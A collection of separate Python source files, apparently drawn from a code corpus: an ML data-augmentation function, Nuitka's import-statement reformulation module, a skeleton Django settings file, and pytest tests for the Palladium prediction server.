raise ValueError("Passed gen_x_times with value 0!")
x_train["target"] = y_train
x_test_bigger = int(1.1 * x_test.shape[0] / x_train.shape[0])
generated_df = x_train.sample(frac=x_test_bigger, replace=True, random_state=42)
num_cols = []
for col in x_train.columns:
if "num" in col:
num_cols.append(col)
for num_col in num_cols:
min_val = x_test[num_col].quantile(0.02)
max_val = x_test[num_col].quantile(0.98)
generated_df = generated_df.loc[
(generated_df[num_col] >= min_val) & (generated_df[num_col] <= max_val)
]
generated_df = generated_df.reset_index(drop=True)
ad_model = adversarial_test(x_test, generated_df.drop("target", axis=1), cat_cols)
generated_df["test_similarity"] = ad_model.predict(
generated_df.drop("target", axis=1), return_shape=False
)
generated_df.sort_values("test_similarity", ascending=False, inplace=True)
generated_df = generated_df.head(int(gen_x_times * x_train.shape[0]))
x_train = pd.concat(
[x_train, generated_df.drop("test_similarity", axis=1)], axis=0
).reset_index(drop=True)
del generated_df
gc.collect()
return x_train.drop("target", axis=1), x_train["target"]
| |
# Copyright 2021, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Reformulation of import statements.
Consult the developer manual for information. TODO: Add ability to sync
source code comments with developer manual sections.
"""
from nuitka.nodes.AssignNodes import (
StatementAssignmentVariable,
StatementAssignmentVariableName,
StatementReleaseVariable,
)
from nuitka.nodes.ConstantRefNodes import makeConstantRefNode
from nuitka.nodes.FutureSpecs import FutureSpec
from nuitka.nodes.GlobalsLocalsNodes import ExpressionBuiltinGlobals
from nuitka.nodes.ImportNodes import (
ExpressionBuiltinImport,
ExpressionImportModuleHard,
ExpressionImportName,
StatementImportStar,
)
from nuitka.nodes.NodeMakingHelpers import mergeStatements
from nuitka.nodes.StatementNodes import StatementsSequence
from nuitka.nodes.VariableRefNodes import ExpressionTempVariableRef
from nuitka.PythonVersions import python_version
from .ReformulationTryFinallyStatements import makeTryFinallyStatement
from .SyntaxErrors import raiseSyntaxError
from .TreeHelpers import makeStatementsSequenceOrStatement, mangleName
# For checking afterwards, if __future__ imports really were at the beginning
# of the file.
_future_import_nodes = []
def checkFutureImportsOnlyAtStart(body):
# Check if a __future__ imports really were at the beginning of the file.
for node in body:
if node in _future_import_nodes:
_future_import_nodes.remove(node)
else:
if _future_import_nodes:
raiseSyntaxError(
"""\
from __future__ imports must occur at the beginning of the file""",
_future_import_nodes[0].source_ref.atColumnNumber(
_future_import_nodes[0].col_offset
),
)
def _handleFutureImport(provider, node, source_ref):
# Don't allow future imports in functions or classes.
if not provider.isCompiledPythonModule():
raiseSyntaxError(
"""\
from __future__ imports must occur at the beginning of the file""",
source_ref.atColumnNumber(node.col_offset),
)
for import_desc in node.names:
object_name, _local_name = import_desc.name, import_desc.asname
_enableFutureFeature(node=node, object_name=object_name, source_ref=source_ref)
# Remember it for checks to be applied once module is complete, e.g. if
# they are all at module start.
node.source_ref = source_ref
_future_import_nodes.append(node)
_future_specs = []
def pushFutureSpec():
_future_specs.append(FutureSpec())
def getFutureSpec():
return _future_specs[-1]
def popFutureSpec():
del _future_specs[-1]
def _enableFutureFeature(node, object_name, source_ref):
future_spec = _future_specs[-1]
if object_name == "unicode_literals":
future_spec.enableUnicodeLiterals()
elif object_name == "absolute_import":
future_spec.enableAbsoluteImport()
elif object_name == "division":
future_spec.enableFutureDivision()
elif object_name == "print_function":
future_spec.enableFuturePrint()
elif object_name == "barry_as_FLUFL" and python_version >= 0x300:
future_spec.enableBarry()
elif object_name == "generator_stop":
future_spec.enableGeneratorStop()
elif object_name == "braces":
raiseSyntaxError("not a chance", source_ref.atColumnNumber(node.col_offset))
elif object_name in ("nested_scopes", "generators", "with_statement"):
# These are enabled in all cases already.
pass
elif object_name == "annotations" and python_version >= 0x370:
future_spec.enableFutureAnnotations()
else:
raiseSyntaxError(
"future feature %s is not defined" % object_name,
source_ref.atColumnNumber(node.col_offset),
)
def buildImportFromNode(provider, node, source_ref):
# "from .. import .." statements. This may trigger a star import, or
# multiple names being looked up from the given module variable name.
# This is pretty complex.
# pylint: disable=too-many-branches,too-many-locals,too-many-statements
module_name = node.module if node.module is not None else ""
level = node.level
# Use default level under some circumstances.
if level == -1:
level = None
elif level == 0 and not _future_specs[-1].isAbsoluteImport():
level = None
if level is not None:
level_obj = makeConstantRefNode(level, source_ref, True)
else:
level_obj = None
# Importing from "__future__" module may enable flags to the parser,
# that we need to know about, handle that.
if module_name == "__future__":
_handleFutureImport(provider, node, source_ref)
target_names = []
import_names = []
# Mapping imported "fromlist" to assigned "fromlist" if any, handling the
# star case as well.
for import_desc in node.names:
object_name, local_name = import_desc.name, import_desc.asname
if object_name == "*":
target_names.append(None)
assert local_name is None
else:
target_names.append(local_name if local_name is not None else object_name)
import_names.append(object_name)
# Star imports get special treatment.
if None in target_names:
# More than "*" is a syntax error in Python, need not care about this at
# all, it's only allowed value for import list in this case.
assert target_names == [None]
# Python3 made it so that these can only occur on the module level,
# so this a syntax error if not there. For Python2 it is OK to
# occur everywhere though.
if not provider.isCompiledPythonModule() and python_version >= 0x300:
raiseSyntaxError(
"import * only allowed at module level",
source_ref.atColumnNumber(node.col_offset),
)
if provider.isCompiledPythonModule():
import_globals = ExpressionBuiltinGlobals(source_ref)
import_locals = ExpressionBuiltinGlobals(source_ref)
else:
import_globals = ExpressionBuiltinGlobals(source_ref)
import_locals = makeConstantRefNode({}, source_ref, True)
return StatementImportStar(
target_scope=provider.getLocalsScope(),
module_import=ExpressionBuiltinImport(
name=makeConstantRefNode(module_name, source_ref, True),
globals_arg=import_globals,
locals_arg=import_locals,
fromlist=makeConstantRefNode(("*",), source_ref, True),
level=level_obj,
source_ref=source_ref,
),
source_ref=source_ref,
)
else:
if module_name == "__future__":
imported_from_module = ExpressionImportModuleHard(
module_name="__future__", source_ref=source_ref
)
else:
imported_from_module = ExpressionBuiltinImport(
name=makeConstantRefNode(module_name, source_ref, True),
globals_arg=ExpressionBuiltinGlobals(source_ref),
locals_arg=makeConstantRefNode(None, source_ref, True),
fromlist=makeConstantRefNode(tuple(import_names), source_ref, True),
level=level_obj,
source_ref=source_ref,
)
# If we have multiple names to import, consider each.
multi_names = len(target_names) > 1
statements = []
if multi_names:
tmp_import_from = provider.allocateTempVariable(
temp_scope=provider.allocateTempScope("import_from"), name="module"
)
statements.append(
StatementAssignmentVariable(
variable=tmp_import_from,
source=imported_from_module,
source_ref=source_ref,
)
)
imported_from_module = ExpressionTempVariableRef(
variable=tmp_import_from, source_ref=source_ref
)
import_statements = []
first = True
for target_name, import_name in zip(target_names, import_names):
# Make a clone of the variable reference, if we are going to use
# another one.
if not first:
imported_from_module = imported_from_module.makeClone()
first = False
import_statements.append(
StatementAssignmentVariableName(
provider=provider,
variable_name=mangleName(target_name, provider),
source=ExpressionImportName(
module=imported_from_module,
import_name=import_name,
level=0,
source_ref=source_ref,
),
source_ref=source_ref,
)
)
# Release the temporary module value as well.
if multi_names:
statements.append(
makeTryFinallyStatement(
provider=provider,
tried=import_statements,
final=(
StatementReleaseVariable(
variable=tmp_import_from, source_ref=source_ref
),
),
source_ref=source_ref,
)
)
else:
statements.extend(import_statements)
# Note: Each import is sequential. It can succeed, and the failure of a
# later one is not undoing previous ones. We can therefore have a
# sequence of imports that each only import one thing therefore.
return StatementsSequence(
statements=mergeStatements(statements), source_ref=source_ref
)
def buildImportModulesNode(provider, node, source_ref):
# Import modules statement. As described in the developer manual, these
# statements can be treated as several ones.
import_names = [
(import_desc.name, import_desc.asname) for import_desc in node.names
]
import_nodes = []
for import_desc in import_names:
module_name, local_name = import_desc
module_topname = module_name.split(".")[0]
# Note: The "level" of import is influenced by the future absolute
# imports.
level = (
makeConstantRefNode(0, source_ref, True)
if _future_specs[-1].isAbsoluteImport()
else None
)
import_node = ExpressionBuiltinImport(
name=makeConstantRefNode(module_name, source_ref, True),
globals_arg=ExpressionBuiltinGlobals(source_ref),
locals_arg=makeConstantRefNode(None, source_ref, True),
fromlist=makeConstantRefNode(None, source_ref, True),
level=level,
source_ref=source_ref,
)
if local_name:
# If is gets a local name, the real name must be used as a
# temporary value only, being looked up recursively.
for import_name in module_name.split(".")[1:]:
import_node = ExpressionImportName(
module=import_node,
import_name=import_name,
# TODO: Does level make sense at all, should be removed.
level=0,
source_ref=source_ref,
)
# If a name was given, use the one provided, otherwise the import gives
# the top level package name given for assignment of the imported
# module.
import_nodes.append(
StatementAssignmentVariableName(
provider=provider,
variable_name=mangleName(
local_name if local_name is not None else module_topname, provider
),
source=import_node,
source_ref=source_ref,
)
)
# Note: Each import is sequential. It will potentially succeed, and the
# failure of a later one is not changing that one bit . We can therefore
# have a sequence of imports that only import one thing therefore.
return makeStatementsSequenceOrStatement(
statements=import_nodes, source_ref=source_ref
)
| |
"""
Django settings for project.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os.path
# Debug
#DEBUG = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
SECRET_KEY = ''
ALLOWED_HOSTS = []
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
USE_TZ = False
DEFAULT_CHARSET = 'utf-8'
FILE_CHARSET = 'utf-8'
SERVER_URL = ""
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
ROOT_DIR = os.path.dirname(__file__)
ROOT_URL = "/djskeletor/"
ROOT_URLCONF = 'djskeletor.urls'
WSGI_APPLICATION = 'djskeletor.wsgi.application'
MEDIA_ROOT = ''
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATIC_ROOT = ''
STATIC_URL = "/static/"
STATICFILES_DIRS = ()
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
DATABASES = {
'default': {
'HOST': '127.0.0.1',
'PORT': '3306',
'NAME': 'djskeletor',
'ENGINE': 'django.db.backends.mysql',
'USER': '',
'PASSWORD': ''
},
}
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.humanize',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'djskeletor',
'djskeletor.core',
'djskeletor.myapp',
'djtools',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# template stuff
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(os.path.dirname(__file__), 'templates'),
"/data2/django_templates/djkorra/",
"/data2/django_templates/djcher/",
"/data2/django_templates/",
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
"djtools.context_processors.sitevars",
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.media',
'django.core.context_processors.request',
'django.template.context_processors.static',
'django.contrib.messages.context_processors.messages',
],
#'loaders': [
# # insert your TEMPLATE_LOADERS here
#]
},
},
]
# caching
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
#'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#'LOCATION': '127.0.0.1:11211',
#'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
#'LOCATION': '/var/tmp/django_directory_cache',
#'TIMEOUT': 60*20,
#'KEY_PREFIX': "DIRECTORY_",
#'OPTIONS': {
# 'MAX_ENTRIES': 80000,
#}
}
}
CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True
# LDAP Constants
LDAP_SERVER = ''
LDAP_PORT = '636'
LDAP_PROTOCOL = "ldaps"
LDAP_BASE = ""
LDAP_USER = ""
LDAP_PASS = ""
LDAP_EMAIL_DOMAIN = ""
# auth backends
AUTHENTICATION_BACKENDS = (
'djauth.ldapBackend.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_URL = '/djskeletor/accounts/login/'
LOGIN_REDIRECT_URL = '/djskeletor/'
USE_X_FORWARDED_HOST = True
#SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
SESSION_COOKIE_DOMAIN=".carthage.edu"
SESSION_COOKIE_NAME ='django_carthage_cookie'
SESSION_COOKIE_AGE = 86400
# logging
LOG_FILEPATH = os.path.join(os.path.dirname(__file__), "logs/")
LOG_FILENAME = LOG_FILEPATH + "debug.log"
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'standard': {
'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'logfile': {
'level':'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filename': LOG_FILENAME,
'maxBytes': 50000,
'backupCount': 2,
'formatter': 'standard',
},
'console':{
'level':'INFO',
'class':'logging.StreamHandler',
'formatter': 'standard'
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'mugshots.upload': {
'handlers':['logfile'],
'propagate': True,
'level':'DEBUG',
},
'core': {
'handlers':['logfile'],
'propagate': True,
'level':'DEBUG',
},
'django': {
'handlers':['console'],
'propagate': True,
'level':'WARN',
},
'django.db.backends': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| |
from datetime import datetime
import io
import json
import math
from threading import Thread
from time import sleep
from unittest.mock import call
from unittest.mock import Mock
from unittest.mock import patch
import dateutil.parser
from flask import request
import numpy as np
import pytest
import ujson
from werkzeug.exceptions import BadRequest
def dec(func):
def inner(*args, **kwargs):
"""dec"""
return func(*args, **kwargs) + '_decorated'
return inner
class TestPredictService:
@pytest.fixture
def PredictService(self):
from palladium.server import PredictService
return PredictService
def test_functional(self, PredictService, flask_app):
model = Mock()
model.threshold = 0.3
model.size = 10
# needed as hasattr would evaluate to True otherwise
del model.threshold2
del model.size2
model.predict.return_value = np.array(['class1'])
service = PredictService(
mapping=[
('sepal length', 'float'),
('sepal width', 'float'),
('petal length', 'float'),
('petal width', 'float'),
('color', 'str'),
('age', 'int'),
('active', 'bool'),
('austrian', 'bool'),
],
params=[
('threshold', 'float'), # default will be overwritten
('size', 'int'), # not provided, default value kept
('threshold2', 'float'), # will be used, no default value
('size2', 'int'), # not provided, no default value
])
with flask_app.test_request_context():
with patch('palladium.util.get_config') as get_config:
get_config.return_value = {
'service_metadata': {
'service_name': 'iris',
'service_version': '0.1'
}
}
request = Mock(
args=dict([
('sepal length', '5.2'),
('sepal width', '3.5'),
('petal length', '1.5'),
('petal width', '0.2'),
('color', 'purple'),
('age', '1'),
('active', 'True'),
('austrian', 'False'),
('threshold', '0.7'),
('threshold2', '0.8'),
]),
method='GET',
)
resp = service(model, request)
assert (model.predict.call_args[0][0] ==
np.array([[5.2, 3.5, 1.5, 0.2,
'purple', 1, True, False]], dtype='object')).all()
assert model.predict.call_args[1]['threshold'] == 0.7
assert model.predict.call_args[1]['size'] == 10
assert model.predict.call_args[1]['threshold2'] == 0.8
assert 'size2' not in model.predict.call_args[1]
assert resp.status_code == 200
expected_resp_data = {
"metadata": {
"status": "OK",
"error_code": 0,
"service_name": "iris",
"service_version": "0.1",
},
"result": "class1"
}
assert json.loads(resp.get_data(as_text=True)) == expected_resp_data
def test_bad_request(self, PredictService, flask_app):
predict_service = PredictService(mapping=[])
model = Mock()
request = Mock()
with patch.object(predict_service, 'do') as psd:
with flask_app.test_request_context():
bad_request = BadRequest()
bad_request.args = ('daniel',)
psd.side_effect = bad_request
resp = predict_service(model, request)
resp_data = json.loads(resp.get_data(as_text=True))
assert resp.status_code == 400
assert resp_data == {
"metadata": {
"status": "ERROR",
"error_code": -1,
"error_message": "BadRequest: ('daniel',)"
}
}
def test_predict_error(self, PredictService, flask_app):
from palladium.interfaces import PredictError
predict_service = PredictService(mapping=[])
model = Mock()
request = Mock()
with patch.object(predict_service, 'do') as psd:
with flask_app.test_request_context():
psd.side_effect = PredictError("mymessage", 123)
resp = predict_service(model, request)
resp_data = json.loads(resp.get_data(as_text=True))
assert resp.status_code == 500
assert resp_data == {
"metadata": {
"status": "ERROR",
"error_code": 123,
"error_message": "mymessage",
}
}
def test_generic_error(self, PredictService, flask_app):
predict_service = PredictService(mapping=[])
model = Mock()
request = Mock()
with patch.object(predict_service, 'do') as psd:
with flask_app.test_request_context():
psd.side_effect = KeyError("model")
resp = predict_service(model, request)
resp_data = json.loads(resp.get_data(as_text=True))
assert resp.status_code == 500
assert resp_data == {
"metadata": {
"status": "ERROR",
"error_code": -1,
"error_message": "KeyError: 'model'",
}
}
def test_sample_from_data(self, PredictService):
predict_service = PredictService(
mapping=[
('name', 'str'),
('sepal width', 'int'),
],
)
model = Mock()
request_args = {'name': 'myflower', 'sepal width': 3}
sample = predict_service.sample_from_data(model, request_args)
assert sample[0] == 'myflower'
assert sample[1] == 3
def test_unwrap_sample_get(self, PredictService, flask_app):
predict_service = PredictService(
mapping=[('text', 'str')],
unwrap_sample=True,
)
model = Mock()
model.predict.return_value = np.array([1])
with flask_app.test_request_context():
request = Mock(
args=dict([
('text', 'Hi this is text'),
]),
method='GET',
)
resp = predict_service(model, request)
assert model.predict.call_args[0][0].ndim == 1
model.predict.assert_called_with(np.array(['Hi this is text']))
resp_data = json.loads(resp.get_data(as_text=True))
assert resp.status_code == 200
assert resp_data == {
"metadata": {
"status": "OK",
"error_code": 0,
},
"result": 1,
}
def test_unwrap_sample_post(self, PredictService, flask_app):
predict_service = PredictService(
mapping=[('text', 'str')],
unwrap_sample=True,
)
model = Mock()
model.predict.return_value = np.array([1, 2])
with flask_app.test_request_context():
request = Mock(
json=[
{'text': 'First piece of text'},
{'text': 'Second piece of text'},
],
method='POST',
mimetype='application/json',
)
resp = predict_service(model, request)
assert model.predict.call_args[0][0].ndim == 1
assert (
model.predict.call_args[0] ==
np.array(['First piece of text', 'Second piece of text'])
).all()
resp_data = json.loads(resp.get_data(as_text=True))
assert resp.status_code == 200
assert resp_data == {
"metadata": {
"status": "OK",
"error_code": 0,
},
"result": [1, 2],
}
def test_probas(self, PredictService, flask_app):
model = Mock()
model.predict_proba.return_value = np.array([[0.1, 0.5, math.pi]])
predict_service = PredictService(mapping=[], predict_proba=True)
with flask_app.test_request_context():
resp = predict_service(model, request)
resp_data = json.loads(resp.get_data(as_text=True))
assert resp.status_code == 200
assert resp_data == {
"metadata": {
"status": "OK",
"error_code": 0,
},
"result": [0.1, 0.5, math.pi],
}
def test_post_request(self, PredictService, flask_app):
model = Mock()
model.predict.return_value = np.array([3, 2])
service = PredictService(
mapping=[
('sepal length', 'float'),
('sepal width', 'float'),
('petal length', 'float'),
('petal width', 'float'),
],
params=[
('threshold', 'float'),
],
)
request = Mock(
json=[
{
'sepal length': '5.2',
'sepal width': '3.5',
'petal length': '1.5',
'petal width': '0.2',
},
{
'sepal length': '5.7',
'sepal width': '4.0',
'petal length': '2.0',
'petal width': '0.7',
},
],
args=dict(threshold=1.0),
method='POST',
mimetype='application/json',
)
with flask_app.test_request_context():
resp = service(model, request)
assert (model.predict.call_args[0][0] == np.array([
[5.2, 3.5, 1.5, 0.2],
[5.7, 4.0, 2.0, 0.7],
],
dtype='object',
)).all()
assert model.predict.call_args[1]['threshold'] == 1.0
assert resp.status_code == 200
expected_resp_data = {
"metadata": {
"status": "OK",
"error_code": 0,
},
"result": [3, 2],
}
assert json.loads(resp.get_data(as_text=True)) == expected_resp_data
@pytest.yield_fixture
def mock_predict(self, monkeypatch):
def mock_predict(model_persister, predict_service):
return predict_service.entry_point
monkeypatch.setattr(
'palladium.server.predict', mock_predict)
yield mock_predict
def test_entry_point_not_set(
self, config, flask_app_test, flask_client, mock_predict):
from palladium.config import process_config
config['model_persister'] = Mock()
config['predict_service'] = {
'!': 'palladium.server.PredictService',
'mapping': [
('param', 'str'),
],
}
# set default predict_decorators
config['predict_decorators'] = ['palladium.tests.test_server.dec']
with flask_app_test.test_request_context():
process_config(config)
resp1 = flask_client.get(
'predict?param=bla')
# decorated result: default predict_decorators is defined
assert resp1.get_data().decode('utf-8') == '/predict_decorated'
def test_entry_point_multiple(
self, config, flask_app_test, flask_client, mock_predict):
from palladium.config import process_config
config['model_persister'] = Mock()
config['my_predict_service'] = {
'!': 'palladium.server.PredictService',
'mapping': [
('param', 'str'),
],
'entry_point': '/predict1',
}
config['my_predict_service2'] = {
'!': 'palladium.server.PredictService',
'mapping': [
('param', 'str'),
],
'entry_point': '/predict2',
'decorator_list_name': 'predict_decorators2',
}
# only second predict service uses decorator list
config['predict_decorators2'] = ['palladium.tests.test_server.dec']
with flask_app_test.test_request_context():
process_config(config)
resp1 = flask_client.get(
'predict1?param=bla')
# no decorated result: default predict_decorators is not defined
assert resp1.get_data().decode('utf-8') == '/predict1'
resp2 = flask_client.get(
'predict2?param=bla')
# decorated result using predict_decorators2
assert resp2.get_data().decode('utf-8') == '/predict2_decorated'
def test_entry_point_multiple_conflict(
self, config, flask_app_test, flask_client, mock_predict):
from palladium.config import process_config
config['model_persister'] = Mock()
config['my_predict_service'] = {
'!': 'palladium.server.PredictService',
'mapping': [
('param', 'str'),
],
'entry_point': '/predict1', # <--
}
config['my_predict_service2'] = {
'!': 'palladium.server.PredictService',
'mapping': [
('param', 'str'),
],
'entry_point': '/predict1', # conflict: entry point exists
}
with pytest.raises(AssertionError):
with flask_app_test.test_request_context():
process_config(config)
class TestPredict:
@pytest.fixture
def predict(self):
from palladium.server import predict
return predict
def test_predict_functional(self, config, flask_app_test, flask_client):
from palladium.server import make_ujson_response
model_persister = config['model_persister'] = Mock()
predict_service = config['predict_service'] = Mock()
with flask_app_test.test_request_context():
from palladium.server import create_predict_function
create_predict_function(
'/predict', predict_service, 'predict_decorators', config)
predict_service.return_value = make_ujson_response(
'a', status_code=200)
model = model_persister.read()
resp = flask_client.get(
'predict?sepal length=1.0&sepal width=1.1&'
'petal length=0.777&petal width=5')
resp_data = json.loads(resp.get_data(as_text=True))
assert resp_data == 'a'
assert resp.status_code == 200
with flask_app_test.test_request_context():
predict_service.assert_called_with(model, request)
def test_unknown_exception(self, predict, flask_app):
model_persister = Mock()
model_persister.read.side_effect = KeyError('model')
with flask_app.test_request_context():
resp = predict(model_persister, Mock())
resp_data = json.loads(resp.get_data(as_text=True))
assert resp.status_code == 500
assert resp_data == {
"status": "ERROR",
"error_code": -1,
"error_message": "KeyError: 'model'",
}
class TestAliveFunctional:
def test_empty_process_state(self, config, flask_client):
config['service_metadata'] = {'hello': 'world'}
resp = flask_client.get('alive')
assert resp.status_code == 200
resp_data = json.loads(resp.get_data(as_text=True))
assert sorted(resp_data.keys()) == ['memory_usage',
'memory_usage_vms',
'palladium_version',
'process_metadata',
'service_metadata']
assert resp_data['service_metadata'] == config['service_metadata']
def test_filled_process_state(self, config, process_store, flask_client):
config['alive'] = {'process_store_required': ('model', 'data')}
before = datetime.now()
process_store['model'] = Mock(__metadata__={'hello': 'is it me'})
process_store['data'] = Mock(__metadata__={'bye': 'not you'})
after = datetime.now()
resp = flask_client.get('alive')
assert resp.status_code == 200
resp_data = json.loads(resp.get_data(as_text=True))
model_updated = dateutil.parser.parse(resp_data['model']['updated'])
data_updated = dateutil.parser.parse(resp_data['data']['updated'])
assert before < model_updated < after
assert resp_data['model']['metadata'] == {'hello': 'is it me'}
assert before < data_updated < after
assert resp_data['data']['metadata'] == {'bye': 'not you'}
def test_missing_process_state(self, config, process_store, flask_client):
config['alive'] = {'process_store_required': ('model', 'data')}
process_store['model'] = Mock(__metadata__={'hello': 'is it me'})
resp = flask_client.get('alive')
assert resp.status_code == 503
resp_data = json.loads(resp.get_data(as_text=True))
assert resp_data['model']['metadata'] == {'hello': 'is it me'}
assert resp_data['data'] == 'N/A'
class TestPredictStream:
@pytest.fixture
def PredictStream(self):
from palladium.server import PredictStream
return PredictStream
@pytest.fixture
def stream(self, config, PredictStream):
config['model_persister'] = Mock()
predict_service = config['predict_service'] = Mock()
predict_service.sample_from_data.side_effect = (
lambda model, data: data)
predict_service.params_from_data.side_effect = (
lambda model, data: data)
return PredictStream()
def test_listen_direct_exit(self, stream):
io_in = io.StringIO()
io_out = io.StringIO()
io_err = io.StringIO()
stream_thread = Thread(
target=stream.listen(io_in, io_out, io_err))
stream_thread.start()
io_in.write('EXIT\n')
stream_thread.join()
io_out.seek(0)
io_err.seek(0)
assert len(io_out.read()) == 0
assert len(io_err.read()) == 0
assert stream.predict_service.predict.call_count == 0
def test_listen(self, stream):
io_in = io.StringIO()
io_out = io.StringIO()
io_err = io.StringIO()
lines = [
'[{"id": 1, "color": "blue", "length": 1.0}]\n',
'[{"id": 1, "color": "{\\"a\\": 1, \\"b\\": 2}", "length": 1.0}]\n',
'[{"id": 1, "color": "blue", "length": 1.0}, {"id": 2, "color": "{\\"a\\": 1, \\"b\\": 2}", "length": 1.0}]\n',
]
for line in lines:
io_in.write(line)
io_in.write('EXIT\n')
io_in.seek(0)
predict = stream.predict_service.predict
predict.side_effect = (
lambda model, samples, **params:
np.array([{'result': 1}] * len(samples))
)
stream_thread = Thread(
target=stream.listen(io_in, io_out, io_err))
stream_thread.start()
stream_thread.join()
io_out.seek(0)
io_err.seek(0)
assert len(io_err.read()) == 0
assert io_out.read() == (
('[{"result":1}]\n' * 2) + ('[{"result":1},{"result":1}]\n'))
assert predict.call_count == 3
# check if the correct arguments are passed to predict call
assert predict.call_args_list[0][0][1] == np.array([
{'id': 1, 'color': 'blue', 'length': 1.0}])
assert predict.call_args_list[1][0][1] == np.array([
{'id': 1, 'color': '{"a": 1, "b": 2}', 'length': 1.0}])
assert (predict.call_args_list[2][0][1] == np.array([
{'id': 1, 'color': 'blue', 'length': 1.0},
{'id': 2, 'color': '{"a": 1, "b": 2}', 'length': 1.0},
])).all()
# check if string representation of attribute can be converted to json
assert ujson.loads(predict.call_args_list[1][0][1][0]['color']) == {
"a": 1, "b": 2}
def test_predict_error(self, stream):
from palladium.interfaces import PredictError
io_in = io.StringIO()
io_out = io.StringIO()
io_err = io.StringIO()
line = '[{"hey": "1"}]\n'
io_in.write(line)
io_in.write('EXIT\n')
io_in.seek(0)
stream.predict_service.predict.side_effect = PredictError('error')
stream_thread = Thread(
target=stream.listen(io_in, io_out, io_err))
stream_thread.start()
stream_thread.join()
io_out.seek(0)
io_err.seek(0)
assert io_out.read() == '[]\n'
assert io_err.read() == (
"Error while processing input row: {}"
"<class 'palladium.interfaces.PredictError'>: "
"error (-1)\n".format(line))
assert stream.predict_service.predict.call_count == 1
def test_predict_params(self, config, stream):
from palladium.server import PredictService
line = '[{"length": 1.0, "width": 1.0, "turbo": "true"}]'
model = Mock()
model.predict.return_value = np.array([[{'class': 'a'}]])
model.turbo = False
model.magic = False
stream.model = model
mapping = [
('length', 'float'),
('width', 'float'),
]
params = [
('turbo', 'bool'), # will be set by request args
('magic', 'bool'), # default value will be used
]
stream.predict_service = PredictService(
mapping=mapping,
params=params,
)
expected = [{'class': 'a'}]
result = stream.process_line(line)
assert result == expected
assert model.predict.call_count == 1
assert (model.predict.call_args[0][0] == np.array([[1.0, 1.0]])).all()
assert model.predict.call_args[1]['turbo'] is True
assert model.predict.call_args[1]['magic'] is False
class TestList:
@pytest.fixture
def list(self):
from palladium.server import list
return list
def test_it(self, config, process_store, flask_client):
mp = config['model_persister'] = Mock()
mp.list_models.return_value = ['one', 'two']
mp.list_properties.return_value = {'hey': 'there'}
resp = flask_client.get('list')
assert resp.status_code == 200
resp_data = json.loads(resp.get_data(as_text=True))
assert resp_data == {
'models': ['one', 'two'],
'properties': {'hey': 'there'},
}
class TestFitFunctional:
@pytest.fixture
def fit(self):
from palladium.server import fit
return fit
@pytest.fixture
def jobs(self, process_store):
jobs = process_store['process_metadata'].setdefault('jobs', {})
yield jobs
jobs.clear()
def test_it(self, fit, config, jobs, flask_app):
dsl, model, model_persister = Mock(), Mock(), Mock()
del model.cv_results_
X, y = Mock(), Mock()
dsl.return_value = X, y
config['dataset_loader_train'] = dsl
config['model'] = model
config['model_persister'] = model_persister
with flask_app.test_request_context(method='POST'):
resp = fit()
sleep(0.05)
resp_json = json.loads(resp.get_data(as_text=True))
job = jobs[resp_json['job_id']]
assert job['status'] == 'finished'
assert job['info'] == str(model)
@pytest.mark.parametrize('args, args_expected', [
(
{'persist': '1', 'activate': '0', 'evaluate': 't'},
{'persist': True, 'activate': False, 'evaluate': True},
),
(
{'persist_if_better_than': '0.234'},
{'persist_if_better_than': 0.234},
),
])
def test_pass_args(self, fit, flask_app, args, args_expected):
with patch('palladium.server.fit_base') as fit_base:
fit_base.__name__ = 'mock'
with flask_app.test_request_context(method='POST', data=args):
fit()
sleep(0.02)
assert fit_base.call_args == call(**args_expected)
